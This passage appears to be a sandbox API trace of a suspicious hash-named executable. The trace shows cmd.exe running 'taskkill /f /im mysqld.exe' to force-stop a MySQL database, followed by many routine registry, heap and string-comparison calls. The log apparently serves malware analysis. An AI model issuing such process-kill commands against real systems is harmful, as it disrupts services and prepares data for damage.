(in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0186.953] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0186.954] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0186.954] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0186.954] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0186.954] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0186.954] RegCloseKey (hKey=0x88) returned 0x0 [0186.954] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0186.954] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0186.954] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0186.954] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0186.954] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0186.954] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0186.954] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0186.955] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0186.955] RegCloseKey (hKey=0x88) returned 0x0 [0186.955] time (in: timer=0x0 | out: timer=0x0) returned 0x62344229 [0186.955] srand (_Seed=0x62344229) [0186.955] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mysqld.exe \"" [0186.955] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mysqld.exe \"" [0186.955] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0186.955] GetProcessHeap () returned 0x5c0000 [0186.955] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x210) returned 0x5c9b38 [0186.955] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5c9b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0186.955] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0186.955] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0186.956] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.956] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0186.956] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0186.956] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0186.956] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0186.956] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0186.956] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0186.956] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0186.956] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0186.956] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0186.957] GetProcessHeap () returned 0x5c0000 [0186.957] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c86e8) returned 1 [0186.957] GetEnvironmentStringsW () returned 0x5c7cc0* [0186.957] GetProcessHeap () returned 0x5c0000 [0186.957] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa32) returned 0x5ca790 [0186.958] FreeEnvironmentStringsA (penv="A") returned 1 [0186.958] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0186.958] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.958] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0186.958] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0186.958] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0186.958] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0186.958] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0186.958] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0186.958] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0186.958] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0186.958] GetProcessHeap () returned 0x5c0000 [0186.958] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x44) returned 0x5c05c8 [0186.958] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0186.959] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0186.959] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0186.959] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5c0618 [0186.959] FindClose (in: hFindFile=0x5c0618 | out: hFindFile=0x5c0618) returned 1 [0186.959] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5c0618 [0186.960] FindClose (in: hFindFile=0x5c0618 | out: hFindFile=0x5c0618) returned 1 [0186.960] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0186.960] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5c0618 [0186.960] FindClose (in: hFindFile=0x5c0618 | out: hFindFile=0x5c0618) returned 1 [0186.960] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0186.961] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0186.961] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0186.961] GetProcessHeap () returned 0x5c0000 [0186.961] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5ca790) returned 1 [0186.962] GetEnvironmentStringsW () returned 0x5c7cc0* [0186.962] GetProcessHeap () returned 0x5c0000 [0186.962] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa76) returned 0x5c9d50 [0186.962] FreeEnvironmentStringsA (penv="=") returned 1 [0186.962] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0186.962] GetProcessHeap () returned 0x5c0000 [0186.962] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c05c8) returned 1 [0186.966] GetProcessHeap () returned 0x5c0000 [0186.966] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x400e) returned 0x5cbc50 [0186.967] GetProcessHeap () returned 0x5c0000 [0186.967] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x48) returned 0x5ca7d0 [0186.967] GetProcessHeap () returned 0x5c0000 [0186.967] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4008) returned 0x5cfc68 [0186.967] GetProcessHeap () returned 0x5c0000 [0186.967] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4008) returned 0x5d3c78 [0186.969] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0186.970] GetProcessHeap () returned 0x5c0000 [0186.970] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x418) returned 0x5ca820 [0186.970] SetErrorMode (uMode=0x0) returned 0x8003 [0186.970] SetErrorMode (uMode=0x1) returned 0x0 [0186.970] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x5ca828, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0186.970] SetErrorMode (uMode=0x8003) returned 0x1 [0186.970] GetProcessHeap () returned 0x5c0000 [0186.970] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5ca820, Size=0x7a) returned 0x5ca820 [0186.971] GetProcessHeap () returned 0x5c0000 [0186.971] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5ca820) returned 0x7a [0186.971] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0186.971] GetProcessHeap () returned 0x5c0000 [0186.971] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x62) returned 0x5ca8a8 [0186.971] GetProcessHeap () returned 0x5c0000 [0186.971] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xb8) returned 0x5ca918 [0186.971] GetProcessHeap () returned 0x5c0000 [0186.971] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5ca918, Size=0x62) returned 0x5ca918 [0186.971] GetProcessHeap () returned 0x5c0000 [0186.971] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5ca918) returned 0x62 [0186.971] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0186.971] GetProcessHeap () returned 0x5c0000 [0186.971] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xe0) returned 0x5ca988 [0186.976] GetProcessHeap () returned 0x5c0000 [0186.976] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5ca988, Size=0x76) returned 0x5ca988 [0186.977] GetProcessHeap () returned 0x5c0000 [0186.977] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5ca988) returned 0x76 [0186.977] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0186.977] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im mysqld.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0186.977] GetLastError () returned 0x3 [0186.977] GetProcessHeap () returned 0x5c0000 [0186.978] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cfc68) returned 1 [0186.978] GetProcessHeap () returned 0x5c0000 [0186.978] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5d3c78) returned 1 [0186.979] GetProcessHeap () returned 0x5c0000 [0186.979] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cbc50) returned 1 [0186.979] GetConsoleOutputCP () returned 0x1b5 [0186.981] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0186.981] GetUserDefaultLCID () returned 0x409 [0186.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0186.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0186.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0186.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0186.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0186.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0186.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0186.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0186.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0186.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0186.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0186.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0186.983] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0186.983] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0186.983] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0186.985] GetProcessHeap () returned 0x5c0000 [0186.985] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20c) returned 0x5caa50 [0186.985] GetConsoleTitleW (in: lpConsoleTitle=0x5caa50, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0186.988] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0186.988] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0186.988] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0186.989] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0186.989] GetProcessHeap () returned 0x5c0000 [0186.989] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x400a) returned 0x5cbc50 [0186.989] GetProcessHeap () returned 0x5c0000 [0186.989] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cbc50) returned 1 [0186.991] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0186.991] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0186.991] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0186.991] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0186.991] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0186.991] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0186.991] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0186.991] GetProcessHeap () returned 0x5c0000 [0186.991] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x58) returned 0x5cac68 [0186.991] GetProcessHeap () returned 0x5c0000 [0186.992] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1a) returned 0x5c0578 [0186.992] GetProcessHeap () returned 0x5c0000 [0186.992] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x30) returned 0x5cacc8 [0186.993] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0186.997] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0186.997] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0186.997] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0186.997] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0186.997] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0186.997] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0186.997] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0186.997] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0186.998] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0186.998] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0186.998] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0186.998] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0186.998] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0186.998] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0186.998] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0186.998] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0186.998] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0186.998] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0186.998] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0186.998] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0186.998] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0186.998] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0186.998] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0186.998] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0186.998] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0186.998] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0186.998] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0186.998] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0186.998] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0186.998] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0186.998] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0186.998] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0186.999] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0186.999] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0186.999] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0186.999] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0186.999] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0186.999] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0186.999] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0186.999] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0186.999] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0186.999] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0186.999] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0186.999] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0186.999] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0186.999] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0186.999] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0186.999] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0186.999] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0186.999] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0186.999] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0186.999] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0186.999] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0186.999] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0186.999] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0187.000] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0187.000] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0187.000] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0187.000] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0187.000] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0187.000] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0187.000] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0187.000] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0187.000] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0187.000] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0187.000] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0187.000] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0187.000] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0187.000] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0187.000] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0187.000] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0187.000] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0187.001] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0187.001] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0187.001] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0187.001] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0187.001] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0187.001] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0187.001] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0187.001] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0187.001] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0187.001] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0187.001] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0187.001] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0187.001] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0187.001] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0187.001] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0187.002] GetProcessHeap () returned 0x5c0000 [0187.002] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x210) returned 0x5cad00 [0187.002] GetProcessHeap () returned 0x5c0000 [0187.002] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x42) returned 0x5caf18 [0187.002] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0187.003] GetProcessHeap () returned 0x5c0000 [0187.003] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x418) returned 0x5c05c8 [0187.003] SetErrorMode (uMode=0x0) returned 0x8003 [0187.003] SetErrorMode (uMode=0x1) returned 0x0 [0187.003] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5c05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0187.003] SetErrorMode (uMode=0x8003) returned 0x1 [0187.003] GetProcessHeap () returned 0x5c0000 [0187.003] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5c05c8, Size=0x56) returned 0x5c05c8 [0187.003] GetProcessHeap () returned 0x5c0000 [0187.003] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c05c8) returned 0x56 [0187.003] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0187.003] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.003] GetProcessHeap () returned 0x5c0000 [0187.003] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x110) returned 0x5caf68 [0187.003] GetProcessHeap () returned 0x5c0000 [0187.003] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x218) returned 0x5c0628 [0187.010] GetProcessHeap () returned 0x5c0000 [0187.010] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5c0628, Size=0x112) returned 0x5c0628 [0187.010] GetProcessHeap () returned 0x5c0000 [0187.011] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c0628) returned 0x112 [0187.011] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0187.011] GetProcessHeap () returned 0x5c0000 [0187.011] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xe0) 